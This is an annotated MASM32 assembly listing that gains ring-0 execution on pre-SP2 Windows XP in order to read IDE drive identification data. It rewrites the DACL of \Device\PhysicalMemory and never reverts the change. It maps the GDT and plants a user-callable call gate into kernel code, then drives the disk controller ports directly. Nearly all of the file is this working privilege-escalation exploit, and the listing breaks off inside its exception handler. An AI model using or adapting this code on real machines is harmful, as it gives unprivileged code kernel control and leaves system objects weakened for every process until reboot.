.686p                                   ; privileged instructions are used below (sgdt, in/out, mov cr0)
.model flat, stdcall
option casemap :none                    ; case sensitive

; #############################################################################
; Windows XP (pre-SP2) ring-0 escalation through \Device\PhysicalMemory and a
; hand-written GDT call gate, used here to send ATA IDENTIFY DEVICE to the
; primary-master IDE drive and display the result.  MASM32 package layout.
; #############################################################################
include     \masm32\include\windows.inc
include     \masm32\include\kernel32.inc
include     \masm32\include\user32.inc
include     \masm32\include\advapi32.inc   ; GetSecurityInfo / SetEntriesInAcl / SetSecurityInfo

includelib  \masm32\lib\kernel32.lib
includelib  \masm32\lib\user32.lib
includelib  \masm32\lib\advapi32.lib
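DEBUG = TRUE                            ; not referenced anywhere in this listing

; Handle / pointer aliases for the NT-native calls made by hand below.
; 32-bit flat model: every handle and pointer is a DWORD.
HMODULE              typedef dword
NTSTATUS             typedef dword
PACL                 typedef dword
PSECURITY_DESCRIPTOR typedef dword

; OBJECT_ATTRIBUTES.Attributes flags (ntdef.h).
OBJ_INHERIT          = 2
OBJ_PERMANENT        = 10h
OBJ_EXCLUSIVE        = 20h
OBJ_CASE_INSENSITIVE = 40h
OBJ_OPENIF           = 80h
OBJ_OPENLINK         = 100h
OBJ_KERNEL_HANDLE    = 200h             ; the listing read "200" (no radix suffix = decimal 0C8h);
                                        ; 200h is the ntdef.h value and is what ExecRing0Proc's
                                        ; hand-built attributes use (240h = 200h or 40h)
OBJ_VALID_ATTRIBUTES = 3F2h

; GetSecurityInfo / SetEntriesInAcl enumerations (accctrl.h).
SE_KERNEL_OBJECT = 6                    ; SE_OBJECT_TYPE: section, event, mutex, ...
GRANT_ACCESS     = 1                    ; ACCESS_MODE
NO_INHERITANCE   = 0                    ; ACE inheritance flags
TRUSTEE_IS_NAME  = 1                    ; TRUSTEE_FORM: ptstrName is a name string
TRUSTEE_IS_USER  = 1                    ; TRUSTEE_TYPE

; NTSTATUS values compared against ZwOpenSection's return value.
STATUS_SUCCESS              = 0
STATUS_ACCESS_DENIED        = 0C0000022h
STATUS_ACCESS_VIOLATION     equ 0C0000005h
STATUS_INFO_LENGTH_MISMATCH equ 0C0000004h
SystemModuleInformation     equ 11      ; ZwQuerySystemInformation class; unused here

PVOID  TYPEDEF DWORD
UNLONG TYPEDEF DWORD                    ; sic (presumably ULONG); unused, kept as-is
CHAR   TYPEDEF BYTE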
UNICODE_STRING struct
    ; Counted UTF-16 string as used by the native API (ntdef.h).
    Length        word ?                ; byte length of the string, NUL not included
    MaximumLength word ?                ; byte size of Buffer
    Buffer        dword ?               ; PWSTR
UNICODE_STRING ends
OBJECT_ATTRIBUTES struct
    ; 24-byte OBJECT_ATTRIBUTES (ntdef.h).  ExecRing0Proc does not use this
    ; type; it fills the global 24-byte ObjAttr buffer with the same layout.
    nLength                  dword ?    ; sizeof OBJECT_ATTRIBUTES = 24
    RootDirectory            HANDLE ?
    ObjectName               dword ?    ; PUNICODE_STRING
    Attributes               dword ?    ; OBJ_* flags
    SecurityDescriptor       dword ?    ; PVOID, points to a SECURITY_DESCRIPTOR
    SecurityQualityOfService dword ?    ; PVOID, points to a SECURITY_QUALITY_OF_SERVICE
OBJECT_ATTRIBUTES ends
TRUSTEE struct
    ; accctrl.h TRUSTEE (five 32-bit members).
    pMultipleTrustee         dword ?    ; PTRUSTEE
    MultipleTrusteeOperation dword ?    ; MULTIPLE_TRUSTEE_OPERATION
    TrusteeForm              dword ?    ; TRUSTEE_FORM (TRUSTEE_IS_NAME here)
    TrusteeType              dword ?    ; TRUSTEE_TYPE (TRUSTEE_IS_USER here)
    ptstrName                dword ?    ; LPTSTR, or SID/object pointer depending on TrusteeForm
TRUSTEE ends
EXPLICIT_ACCESS struct
    ; accctrl.h EXPLICIT_ACCESS: one ACE description for SetEntriesInAcl.
    grfAccessPermissions DWORD ?        ; access mask (SECTION_MAP_WRITE here)
    grfAccessMode        dword ?        ; ACCESS_MODE (GRANT_ACCESS here)
    grfInheritance       DWORD ?        ; inheritance flags (NO_INHERITANCE here)
    Trustee              TRUSTEE <>     ; who the ACE applies to
EXPLICIT_ACCESS ends
MyGATE struct                           ; call-gate descriptor layout (8 bytes)
    ; Documents the descriptor that ExecRing0Proc writes at GDT selector 3E0h
    ; with raw dword stores; the type itself is not referenced.
    OFFSETL  WORD ?                     ; low 16 bits of the 32-bit target offset
    SELECTOR WORd ?                     ; target code-segment selector
    DCOUNT   BYTE ?                     ; dword parameter count (0)
    GTYPE    BYTE ?                     ; P | DPL | type (ECh = present, DPL 3, 32-bit call gate)
    OFFSETH  WORD ?                     ; high 16 bits of the target offset
MyGATE ends
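IDEINFO struct
    ; ATA IDENTIFY DEVICE response (256 words = 512 bytes), same layout as the
    ; IDSECTOR structure of Microsoft's SMART sample; field names kept.
    ; MASM packs structs without padding, so each byte offset is 2 * the ATA
    ; word number.  The "s*" fields are ASCII with the two bytes of each word
    ; swapped by the drive; the ring-0 payload swaps them back in place.
    ;
    ; Fix: the original declared bReserved as 128 bytes, making the struct
    ; 256 bytes, while ExecRing0Proc does `rep insw` with ecx = 100h (512
    ; bytes) into stIDEINFO - a 256-byte overrun past the last item of .data?,
    ; performed in ring 0.  bReserved is now 384 bytes so the struct holds the
    ; whole block.  Nothing in the listing depends on the old size.
    wGenConfig                  dw ?            ; word 0
    wNumCyls                    dw ?            ; word 1: cylinders
    wReserved                   dw ?            ; word 2
    wNumHeads                   dw ?            ; word 3: heads
    wBytesPerTrack              dw ?            ; word 4: bytes per track
    wBytesPerSector             dw ?            ; word 5: bytes per sector
    wSectorsPerTrack            dw ?            ; word 6: sectors per track
    wVendorUnique               dw 3 dup (?)    ; words 7-9
    sSerialNumber               db 20 dup (?)   ; words 10-19: serial number
    wBufferType                 dw ?            ; word 20
    wBufferSize                 dw ?            ; word 21: buffer size, n * 512 bytes
    wECCSize                    dw ?            ; word 22
    sFirmwareRev                db 8 dup (?)    ; words 23-26: firmware revision
    sModelNumber                db 40 dup (?)   ; words 27-46: model number
    wMoreVendorUnique           dw ?            ; word 47
    wDoubleWordIO               dw ?            ; word 48
    wCapabilities               dw ?            ; word 49
    wReserved1                  dw ?            ; word 50
    wPIOTiming                  dw ?            ; word 51
    wDMATiming                  dw ?            ; word 52
    wBS                         dw ?            ; word 53
    wNumCurrentCyls             dw ?            ; word 54
    wNumCurrentHeads            dw ?            ; word 55
    wNumCurrentSectorsPerTrack  dw ?            ; word 56
    dwCurrentSectorCapacity     dd ?            ; words 57-58
    wMultSectorStuff            dw ?            ; word 59
    dwTotalAddressableSectors   dd ?            ; words 60-61
    wSingleWordDMA              dw ?            ; word 62
    wMultiWordDMA               dw ?            ; word 63
    bReserved                   db 384 dup (?)  ; words 64-255 (was 128 dup: see note above)
IDEINFO ends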
; Forward declarations so that `invoke` can type-check the calls below.
SetPhyscialMemorySectionCanBeWrited proto :dword   ; (hSection) -> widens the section's DACL
MiniMmGetPhysicalAddress proto :dword              ; (kernel VA) -> physical address, or 0

ENTERRING0 macro
    ; Save registers and flags, mask interrupts and clear CR0.WP (bit 16) so
    ; that ring-0 code may write read-only pages.  Requires CPL 0.
    ; Not invoked anywhere in this listing; the payload in ExecRing0Proc uses
    ; its own stack switch instead and never clears WP.
    pushad
    pushfd
    cli
    mov     eax,cr0                     ; get rid of the read-only protection (WP)
    and     eax,0fffeffffh
    mov     cr0,eax
endm
LEAVERING0 macro
    ; Counterpart of ENTERRING0: set CR0.WP again, re-enable interrupts,
    ; restore registers and leave the ring-0 code segment with a far return.
    ; `sti` is redundant (popfd restores IF) but harmless.
    ; Not invoked anywhere in this listing.
    mov     eax,cr0                     ; restore the read-only protection (WP)
    or      eax,10000h
    mov     cr0,eax
    sti
    popfd
    popad
    retf
endm
UNICODE_STR macro str
    ; Emit <str> as UTF-16LE without a terminator: each character followed by
    ; a zero byte.  Only meaningful for ASCII input.
    irpc _c,<str>
        db '&_c'
        db 0
    endm
endm
.data?
; Uninitialized storage (zero-filled by the loader).
GdtLimit        dw ?                    ; `sgdt GdtLimit` writes the 6-byte GDTR here: limit ...
GdtAddr         dd ?                    ; ... then the linear base; the two must stay adjacent

mapAddr         dd ?                    ; physical address of the page holding the GDT
OldEsp          dd ?                    ; esp right after the SEH frame is pushed (used by MySEH)

readed          dw ?                    ; byte countdown used by _ShowBuffer
buffer          db 512 dup(?)           ; one sector, hex-dumped by _ShowBuffer
ShowText        db 512*3 dup (?)        ; "XX " per byte; no spare byte for a NUL terminator

szBuffer        db 1024 dup (?)         ; wsprintf output (1024 is also wsprintf's own limit)
szModelNumber   db 41 dup (?)           ; 40-char field + NUL (the NUL is the zero-fill)
szSerialNumber  db 21 dup (?)           ; 20-char field + NUL
szFirmwareRev   db 9 dup (?)            ; 8-char field + NUL

stIDEINFO       IDEINFO <>              ; IDENTIFY DEVICE data, filled by the ring-0 payload; last item of .data?
.data
align 4
; UNICODE_STRING for "\Device\PhysicalMemory": Length = byte length without a
; terminator (44), MaximumLength = 46 (the buffer itself is only 44 bytes,
; which is fine for a read-only open), Buffer is set at run time (objnameptr).
; objname must stay exactly 8 bytes before obj namestr: ExecRing0Proc derives
; its address as objnamestr-8.
objname         dw objnamestr_size,objnamestr_size+2
objnameptr      dd 0
objnamestr      equ this byte
                UNICODE_STR <\Device\PhysicalMemory>
objnamestr_size equ $-objnamestr

szTitle   db 'IDE 硬盘信息',0                   ; "IDE hard disk information"
szErrInfo db '无法读取硬盘信息',0               ; "unable to read hard disk information"
szIDEInfo db '柱面数 : %d',0dh,0ah              ; cylinders
          db '磁头数 : %d',0dh,0ah              ; heads
          db '每道扇区数 : %d',0dh,0ah          ; sectors per track
          db '缓冲大小 : %d 扇区',0dh,0ah       ; buffer size (in sectors)
          db '硬盘型号 : %40s',0dh,0ah          ; model number
          db '序列号 : %20s',0dh,0ah            ; serial number
          db '版本号 : %8s',0                   ; firmware revision

align 4
ObjAttr db 24 dup (0)                   ; OBJECT_ATTRIBUTES built by hand in ExecRing0Proc (align 4 matters)

Callgt  dq 0                            ; far pointer 3E3h:00000000 used by `call fword ptr [Callgt]`
Caption db 'Windows XP绝对磁盘读写',0   ; "Windows XP raw disk read/write" (caption used by _ShowBuffer)
Digit   db '0123456789ABCDEF',0         ; hex-digit table for xlatb
.code
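_ShowBuffer proc
    ; Render the 512 bytes of `buffer` as a hex dump into `ShowText` and show
    ; it in a message box.  Format: "XX " per byte, 16 bytes per row, the row's
    ; trailing space replaced by CR (0Dh).
    ; Not called from any code visible in this listing (debugging aid).
    ; Clobbers: eax, ebx, ecx, esi, edi, readed.
    ;
    ; Fix: ShowText is exactly 512*3 bytes and the original never wrote a NUL,
    ; so MessageBoxA read past the end of ShowText into whatever follows it.
    ; The last byte emitted is always a row-ending CR; it is replaced by NUL.
    mov     [readed],512
    mov     esi,offset buffer           ; source bytes
    mov     edi,offset ShowText         ; destination text
    mov     ebx,offset Digit            ; xlatb table: nibble -> ASCII hex digit
    xor     ecx,ecx                     ; bytes emitted in the current row
    xor     eax,eax                     ; upper 24 bits stay 0 so shr/and below see only al
computeAgain:
    cmp     [readed],0
    jz      endCompute
    dec     [readed]
    lodsb                               ; al = next byte
    push    eax
    shr     eax,4                       ; high nibble
    xlatb
    stosb
    pop     eax
    and     eax,0fH                     ; low nibble
    xlatb
    stosb
    mov     byte ptr [edi],' '          ; separator
    inc     edi
    inc     ecx
    cmp     ecx,16
    jnz     computeAgain
    xor     ecx,ecx
    mov     byte ptr [edi-1],13         ; end of a 16-byte row: space -> CR
    jmp     computeAgain
endCompute:
    mov     byte ptr [edi-1],0          ; NUL-terminate inside ShowText (overwrites the final CR)
    invoke  MessageBoxA,NULL,offset ShowText,offset Caption,MB_OK
    ret
_ShowBuffer endp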
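SetPhyscialMemorySectionCanBeWrited proc uses ebx esi edi hSection:HANDLE
    ; Widen the DACL of the \Device\PhysicalMemory section object so that the
    ; calling user ("CURRENT_USER") is granted SECTION_MAP_WRITE; the caller
    ; then reopens the section for writing.
    ;
    ; In:  hSection - handle opened with at least READ_CONTROL or WRITE_DAC
    ; Out: eax = ERROR_SUCCESS, or the Win32 error code of the failing call.
    ;      (The original returned whatever LocalFree left in eax; the caller
    ;      in this listing ignores the return value either way.)
    ;
    ; SECURITY NOTE: this is a persistent change to a kernel object's DACL
    ; that is never reverted.  Every process of that user can map physical
    ; memory read/write until reboot.
    ;
    ; Fixes vs. the original:
    ;  - pDacl/pNewDacl/pSD are zeroed on entry.  They were left as stack
    ;    garbage, so when GetSecurityInfo failed the cleanup path compared
    ;    uninitialized locals with 0 and could LocalFree a random pointer.
    ;  - SetSecurityInfo's result is checked and returned.
    local pDacl:PACL
    local pNewDacl:PACL
    local pSD:PSECURITY_DESCRIPTOR
    local dwRes:DWORD
    local ea:EXPLICIT_ACCESS

    mov     pDacl,0
    mov     pNewDacl,0
    mov     pSD,0

    ; Current DACL.  pDacl points into pSD, which must be LocalFree'd.
    invoke  GetSecurityInfo,hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,\
            NULL,NULL,addr pDacl,NULL,addr pSD
    mov     dwRes,eax
    cmp     eax,ERROR_SUCCESS
    jnz     OutSet

    ; One explicit ACE: allow SECTION_MAP_WRITE to the current user.
    mov     ea.grfAccessPermissions,SECTION_MAP_WRITE
    mov     ea.grfAccessMode,GRANT_ACCESS
    mov     ea.grfInheritance,NO_INHERITANCE
    mov     ea.Trustee.pMultipleTrustee,0
    mov     ea.Trustee.MultipleTrusteeOperation,0
    mov     ea.Trustee.TrusteeForm,TRUSTEE_IS_NAME
    mov     ea.Trustee.TrusteeType,TRUSTEE_IS_USER
    call    @f                          ; call/pop: edx = address of the inline name string
    db      "CURRENT_USER",0
@@:
    pop     edx
    mov     ea.Trustee.ptstrName,edx

    ; Merge the ACE into a new DACL (pNewDacl, LocalFree'd below).
    invoke  SetEntriesInAcl,1,addr ea,pDacl,addr pNewDacl
    mov     dwRes,eax
    cmp     eax,ERROR_SUCCESS
    jnz     OutSet

    invoke  SetSecurityInfo,hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,\
            NULL,NULL,pNewDacl,NULL
    mov     dwRes,eax
OutSet:
    cmp     pSD,0
    jz      @f
    invoke  LocalFree,pSD
@@:
    cmp     pNewDacl,0
    jz      @f
    invoke  LocalFree,pNewDacl
@@:
    mov     eax,dwRes
    ret
SetPhyscialMemorySectionCanBeWrited endp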
MiniMmGetPhysicalAddress proc virtualaddress:dword
    ; Translate a kernel linear address to a physical page address on the
    ; assumption that the first 512 MB of RAM are identity-mapped at
    ; 80000000h (non-PAE Windows XP kernel).  No page tables are consulted.
    ;
    ; In:  virtualaddress - linear address
    ; Out: eax = page-aligned physical address for addresses in
    ;      [80000000h, 0A0000000h); 0 otherwise.  Note that 80000xxxh also
    ;      yields 0, so 0 is ambiguous for the very first page.
    ; Clobbers: eax, flags.
    ;
    ; NOTE(review): wrong on PAE kernels and on anything newer than XP; the
    ; caller treats 0 as "unsupported".
    mov     eax,virtualaddress
    sub     eax,80000000h               ; eax = offset into the identity map (wraps for lower VAs)
    cmp     eax,20000000h               ; only the first 512 MB are covered
    jae     outside
    and     eax,0FFFFF000h              ; keep the page-frame part of the offset
    ret
outside:
    xor     eax,eax
    ret
MiniMmGetPhysicalAddress endp
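ExecRing0Proc proc
    ; Execute the IDENTIFY DEVICE payload at _Ring0Proc in ring 0 on Windows
    ; XP (pre-SP2) by planting a DPL-3 call gate in the GDT through a
    ; read/write view of \Device\PhysicalMemory.
    ;
    ; Out: eax = TRUE when the payload ran (stIDEINFO stays zero if the drive
    ;      timed out), 0 on any failure.  Clobbers ebx, esi, edi.
    ;
    ; How it works:
    ;  1. sgdt -> GdtLimit/GdtAddr.  GdtAddr is a kernel linear address; on a
    ;     non-PAE XP kernel the first 512 MB of RAM are identity-mapped at
    ;     80000000h, so MiniMmGetPhysicalAddress can turn it into a physical
    ;     page address.  Anything else -> fail.
    ;  2. ZwOpenSection("\Device\PhysicalMemory") for read/write mapping.  On
    ;     STATUS_ACCESS_DENIED: reopen with READ_CONTROL|WRITE_DAC, widen the
    ;     DACL (SetPhyscialMemorySectionCanBeWrited), close, open again.
    ;  3. MapViewOfFile the page that holds the GDT.
    ;  4. Unless it is already there, write a 32-bit call gate (P, DPL 3) at
    ;     selector 3E0h and a flat ring-0 code descriptor at 3E8h.  The gate
    ;     targets the GDT's own first byte (the unused null descriptor), which
    ;     is patched to C3h (near RET): the far call pushes SS3/ESP3/CS3/EIP3,
    ;     the RET pops EIP3 - the instruction right after the far call, i.e.
    ;     _Ring0Proc - so execution continues there with CS = 3E8h (ring 0).
    ;  5. `call fword ptr [Callgt]` (3E3h:0), run the payload, `retf` back.
    ;  6. Zero the two descriptors again, unmap the view, close the section.
    ;
    ; SECURITY / STABILITY NOTES
    ;  - This is a full user-to-kernel privilege escalation; XP SP2 removed
    ;    user-mode access to \Device\PhysicalMemory for exactly this reason.
    ;    The DACL change of step 2 is not reverted and lasts until reboot.
    ;  - The original left the DPL-3 gate and the ring-0 code descriptor in
    ;    the GDT permanently: any process could then `call fword 3E3h:0` into
    ;    ring 0.  This version zeroes them after use.  Two concurrent
    ;    instances can still race (one zeroing the gate the other relies on);
    ;    the loser takes a user-mode #NP/#GP that MySEH turns into
    ;    ExitProcess(-1), not a bugcheck.
    ;  - The payload runs in ring 0 on the *ring-3* stack with interrupts
    ;    enabled (no cli) and drives the primary IDE controller's legacy ports
    ;    directly, behind the OS disk driver.  An interrupt or page fault in
    ;    that window is serviced on the user stack; a non-resident stack page
    ;    at raised IRQL would bugcheck.  TIME_CRITICAL priority + Sleep(0)
    ;    only narrows the window (the original carried a commented-out
    ;    VirtualLock of the code; that would still not cover the stack).
    ;  - OBJ_KERNEL_HANDLE (part of the 240h attributes) is presumably
    ;    ignored for a user-mode caller; OBJ_CASE_INSENSITIVE is the flag
    ;    that matters.
    ;
    ; Fixes vs. the original listing:
    ;  - on a GDT outside the identity map it did `jmp Exit1`, leaving this
    ;    proc's frame on the stack so main's `pop fs:[0]` popped the wrong
    ;    dword into the SEH chain; it now returns 0.
    ;  - the READ_CONTROL|WRITE_DAC reopen status was never checked, so a
    ;    failed reopen fed an undefined hSection to GetSecurityInfo/ZwClose.
    ;  - GetProcAddress results for ZwOpenSection/ZwClose are checked.
    ;  - the GDT's in-page offset is added to the view base and view size;
    ;    the original indexed from the page start, which only works because
    ;    the stock XP GDT (8003F000h) is page-aligned.
    ;  - `rep insw` stores at most sizeof IDEINFO bytes and drains the rest
    ;    of the 256-word block; the IDEINFO struct in this listing is 256
    ;    bytes, so the original overran stIDEINFO by 256 bytes in ring 0.
    ;  - the view is unmapped and the section handle closed on every exit
    ;    path after it was opened; the listing's stray "rintWin32Error(...)"
    ;    line (a C comment that lost its ';') is a comment again.
    ;  - dead code removed: the always-true `setcg` test, the `lea/test` of a
    ;    label address, and the unused locals tmpSel/objectAttributes/objName.
    local BaseAddress:dword             ; view base returned by MapViewOfFile
    local NtdllMod:dword
    local hSection:HANDLE
    local status:NTSTATUS
    local PageOffset:dword              ; GdtAddr and 0FFFh
    local ZwCloseFn:dword               ; ntdll!ZwClose

    mov     status,STATUS_SUCCESS
    sgdt    GdtLimit                    ; fills GdtLimit (word) and the adjacent GdtAddr (dword)
    mov     eax,GdtAddr
    and     eax,0FFFh
    mov     PageOffset,eax
    invoke  MiniMmGetPhysicalAddress,GdtAddr
    mov     mapAddr,eax
    test    eax,eax
    jnz     @f
    ; GDT outside the identity-mapped range we understand: give up.
    xor     eax,eax
    ret
@@:
    call    @f                          ; call/pop trick: pushes the address of the string
    db      "Ntdll.dll",0
@@:
    call    LoadLibraryA
    mov     NtdllMod,eax

    ; Build OBJECT_ATTRIBUTES by hand in the global ObjAttr buffer:
    ;   +0  Length            = 24 (sizeof OBJECT_ATTRIBUTES)
    ;   +4  RootDirectory     = 0
    ;   +8  ObjectName        = &objname (UNICODE_STRING "\Device\PhysicalMemory")
    ;   +12 Attributes        = 240h = OBJ_KERNEL_HANDLE or OBJ_CASE_INSENSITIVE
    ;   +16 SecurityDescriptor, +20 SecurityQualityOfService = 0
    lea     edx,objnamestr
    mov     objnameptr,edx              ; UNICODE_STRING.Buffer
    lea     edi,ObjAttr
    and     di,0fffch                   ; ObjAttr is already `align 4`; this is a no-op guard
    push    edi                         ; edi -> ObjAttr
    push    24                          ; sizeof OBJECT_ATTRIBUTES (not the name length)
    pop     ecx
    push    ecx
    xor     eax,eax
    rep     stosb                       ; zero all 24 bytes
    pop     ecx
    pop     edi
    mov     esi,edi                     ; esi -> ObjAttr, kept for the ZwOpenSection calls
    stosd                               ; +0 placeholder, overwritten just below
    mov     dword ptr [esi],ecx         ; Length = 24
    stosd                               ; RootDirectory = 0
    lea     eax,[edx-8]                 ; objname lies 8 bytes before objnamestr
    stosd                               ; ObjectName
    mov     dword ptr [edi],240h        ; Attributes

    ; Resolve the two native entry points we call by hand.
    call    @f
    db      "ZwOpenSection",0
@@:
    push    NtdllMod
    call    GetProcAddress
    test    eax,eax
    jnz     @f
    xor     eax,eax                     ; not exported: cannot continue
    ret
@@:
    mov     ebx,eax                     ; ebx = ZwOpenSection for the rest of the proc
    call    @f
    db      "ZwClose",0
@@:
    push    NtdllMod
    call    GetProcAddress
    test    eax,eax
    jnz     @f
    xor     eax,eax
    ret
@@:
    mov     ZwCloseFn,eax

    ; First attempt: open for read/write mapping.
    push    esi                         ; ObjectAttributes
    push    SECTION_MAP_READ or SECTION_MAP_WRITE
    lea     edi,hSection
    push    edi                         ; &hSection
    call    ebx                         ; ZwOpenSection(&hSection, access, ObjAttr)
    mov     status,eax
    cmp     status,STATUS_ACCESS_DENIED
    jnz     AccessPermit

    ; Denied: reopen with the rights needed to rewrite the DACL.
    push    esi
    push    READ_CONTROL or WRITE_DAC
    push    edi
    call    ebx
    mov     status,eax
    cmp     status,STATUS_SUCCESS
    jnz     AccessPermit                ; the original fell through with an undefined hSection
    invoke  SetPhyscialMemorySectionCanBeWrited,hSection
    push    hSection
    call    ZwCloseFn                   ; ZwClose(hSection)

    ; Third attempt: the DACL now allows a read/write mapping.
    push    esi
    push    SECTION_MAP_READ or SECTION_MAP_WRITE
    lea     edi,hSection
    push    edi
    call    ebx
    mov     status,eax
AccessPermit:
    cmp     status,STATUS_SUCCESS
    jz      @f
    ; Error opening the PhysicalMemory section object; `status` holds the NTSTATUS.
    mov     eax,0
    ret
@@:
    ; Map the GDT: view size = in-page offset + (limit + 1) bytes, starting at
    ; the page-aligned physical address.
    movzx   eax,word ptr [GdtLimit]
    inc     eax
    add     eax,PageOffset
    invoke  MapViewOfFile,hSection,FILE_MAP_READ or FILE_MAP_WRITE,0,mapAddr,eax
    mov     BaseAddress,eax
    cmp     BaseAddress,0
    jnz     @f
    ; MapViewOfFile failed (GetLastError has the reason): close and report failure.
    push    hSection
    call    ZwCloseFn
    xor     eax,eax
    ret
@@:
    mov     esi,eax                     ; esi -> mapped page
    add     esi,PageOffset              ; esi -> GDT base
    mov     ecx,3e0h                    ; selector 3E0h: call gate; 3E8h: ring-0 code segment
    mov     eax,GdtAddr
    .if dword ptr [esi+ecx+2]!=0ec0003e8h
        ; Gate not installed yet (or the slot holds something else).
        mov     byte ptr [esi],0c3h             ; RET at GDT+0 (inside the unused null descriptor)
        mov     word ptr [esi+ecx],ax           ; gate offset low  = linear address of that RET
        shr     eax,16
        mov     word ptr [esi+ecx+6],ax         ; gate offset high
        mov     dword ptr [esi+ecx+2],0ec0003e8h ; selector 3E8h, 0 params, type ECh = P|DPL3|32-bit call gate
        mov     dword ptr [esi+ecx+8],0000ffffh  ; 3E8h: base 0, limit FFFFF with G=1 -> 4 GB
        mov     dword ptr [esi+ecx+12],00cf9a00h ;       DPL 0, code, readable, 32-bit
    .endif

    ; Far pointer 3E3h:0 -> the gate with RPL 3; the offset is ignored for gates.
    and     dword ptr Callgt,0
    xor     eax,eax
    mov     ax,3e0h
    or      al,3h
    mov     word ptr [Callgt+4],ax

    ; Shrink the preemption window while we are in ring 0 on a user stack.
    invoke  GetCurrentThread
    invoke  SetThreadPriority,eax,THREAD_PRIORITY_TIME_CRITICAL
    invoke  Sleep,0
    call    fword ptr [Callgt]          ; through the gate: the RET at GDT+0 lands HERE in ring 0
_Ring0Proc:                             ; ---- ring 0 from here to the retf ----
    ; Ring-0 stack: [esp] CS3, [esp+4] ESP3, [esp+8] SS3 (EIP3 was consumed by the RET).
    mov     eax,esp                     ; save ring-0 esp
    mov     esp,[esp+4]                 ; continue on the ring-3 stack
    push    eax
    mov     ebx,offset stIDEINFO
    assume  ebx:ptr IDEINFO
    ;********************************************************************
    ; Wait for the drive: status == DRDY|DSC, BSY clear
    ;********************************************************************
    mov     ecx,10000h
    mov     dx,01f7h                    ; primary controller status register
@@:
    in      al,dx
    cmp     al,50h
    jz      @F
    loop    @B
    jmp     _II_TimeOut
@@:
    ;********************************************************************
    ; Issue the command.  Primary controller: ports 1F0h-1F7h (secondary:
    ; 170h-177h).  1F6h selects the device: A0h = master, B0h = slave.
    ; 1F7h takes the command: ECh = IDENTIFY DEVICE (ATA), A1h for ATAPI.
    ;********************************************************************
    mov     al,0a0h                     ; drive 0, head 0
    mov     dx,01f6h                    ; drive/head register
    out     dx,al
    mov     al,0ech
    inc     dx                          ; command register (1F7h)
    out     dx,al
    ;********************************************************************
    ; Wait for DRDY|DSC|DRQ
    ;********************************************************************
    mov     ecx,10000h
@@:
    in      al,dx                       ; 1F7h (status register)
    cmp     al,58h                      ; drive ready, seek complete, data request
    jz      @F
    loop    @B
    jmp     _II_TimeOut
@@:
    ;********************************************************************
    ; Read the response.  The full 100h words must be consumed or the drive
    ; does not finish the command; store what the struct can hold and drain
    ; the remainder.
    ;********************************************************************
    .ERRE (sizeof IDEINFO) LE 512, <IDEINFO is larger than an IDENTIFY DEVICE block>
    cld
    mov     edx,01f0h                   ; data register
    mov     edi,ebx
    mov     ecx,(sizeof IDEINFO)/2
    rep     insw
    mov     ecx,0100h-(sizeof IDEINFO)/2 ; words the struct cannot hold (0 when it is 512 bytes)
    jecxz   _II_Drained
_II_Drain:
    in      ax,dx                       ; read and discard
    loop    _II_Drain
_II_Drained:
    ;********************************************************************
    ; Model, serial number and firmware revision arrive as byte-swapped
    ; words; swap them back into plain byte order (firmware and model are
    ; contiguous: 8 + 40 bytes = 24 words).
    ;********************************************************************
    lea     esi,[ebx].sSerialNumber
    mov     edi,esi
    mov     ecx,10
@@:
    lodsw
    xchg    ah,al
    stosw
    loop    @B
    lea     esi,[ebx].sFirmwareRev
    mov     edi,esi
    mov     ecx,24
@@:
    lodsw
    xchg    ah,al
    stosw
    loop    @B
_II_TimeOut:
    assume  ebx:nothing
    pop     esp                         ; back to the ring-0 stack: [esp]=CS3,[esp+4]=ESP3,[esp+8]=SS3
    push    offset Ring3
    retf                                ; inter-privilege return: CS3:Ring3, then ESP3/SS3 restored
Ring0CodeLen=$-_Ring0Proc
Ring3:
    invoke  GetCurrentThread
    invoke  SetThreadPriority,eax,THREAD_PRIORITY_NORMAL

    ; Remove the backdoor: zero gate 3E0h and code segment 3E8h and put the
    ; null descriptor's first byte back to 0 (all zero on a stock XP GDT).
    mov     esi,BaseAddress
    add     esi,PageOffset
    mov     byte ptr [esi],0
    xor     eax,eax
    mov     dword ptr [esi+3e0h],eax
    mov     dword ptr [esi+3e4h],eax
    mov     dword ptr [esi+3e8h],eax
    mov     dword ptr [esi+3ech],eax

    invoke  UnmapViewOfFile,BaseAddress
    push    hSection
    call    ZwCloseFn                   ; ZwClose(hSection)
    mov     eax,TRUE
    ret
ExecRing0Proc endp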
main:
    ; Program entry (flat, stdcall, MASM32).  Installs a last-resort SEH
    ; frame, refuses to run on Win9x, runs the ring-0 IDENTIFY payload and
    ; shows either the drive data or an error text in a message box.
    assume  fs:nothing
    push    offset MySEH                ; EXCEPTION_REGISTRATION.handler
    push    fs:[0]                      ; EXCEPTION_REGISTRATION.prev
    mov     fs:[0],esp
    mov     OldEsp,esp                  ; MySEH unwinds back to this frame

    ; Win9x hands user mode LDT selectors (TI bit, bit 2, set); NT uses GDT
    ; selectors.  The technique below is NT-only, so bail out on Win9x.
    mov     ax,ds
    test    ax,4
    jnz     Exit1

    invoke  ExecRing0Proc

    ; A zero cylinder count means the payload never filled stIDEINFO.
    mov     eax,offset szErrInfo
    cmp     stIDEINFO.wNumCyls,0
    jz      ShowResult

    ; Copy the three ID strings into NUL-terminated buffers; each buffer is
    ; one byte longer than its field and lives in zero-filled .data?.
    cld
    lea     esi,stIDEINFO.sFirmwareRev
    mov     edi,offset szFirmwareRev
    mov     ecx,sizeof stIDEINFO.sFirmwareRev
    rep     movsb

    lea     esi,stIDEINFO.sSerialNumber
    mov     edi,offset szSerialNumber
    mov     ecx,sizeof stIDEINFO.sSerialNumber
    rep     movsb

    lea     esi,stIDEINFO.sModelNumber
    mov     edi,offset szModelNumber
    mov     ecx,sizeof stIDEINFO.sModelNumber
    rep     movsb

    ; Format the report (well under wsprintf's 1024-byte limit / szBuffer size).
    movzx   eax,stIDEINFO.wNumCyls
    movzx   ebx,stIDEINFO.wNumHeads
    movzx   ecx,stIDEINFO.wSectorsPerTrack
    movzx   edx,stIDEINFO.wBufferSize
    invoke  wsprintf,addr szBuffer,addr szIDEInfo,eax,ebx,ecx,edx,addr szModelNumber,addr szSerialNumber,addr szFirmwareRev
    mov     eax,offset szBuffer
ShowResult:
    invoke  MessageBox,NULL,eax,addr szTitle,MB_ICONINFORMATION or MB_OK
Exit1:
    ; Normal exit: unhook the SEH frame and leave.  Also the target of the
    ; Win9x check above.
    pop     fs:[0]
    add     esp,4
    invoke  ExitProcess,0

MySEH:
    ; Exception handler of last resort (e.g. #GP/#NP if the call gate is
    ; missing or the privileged path faults): rewind to the saved frame,
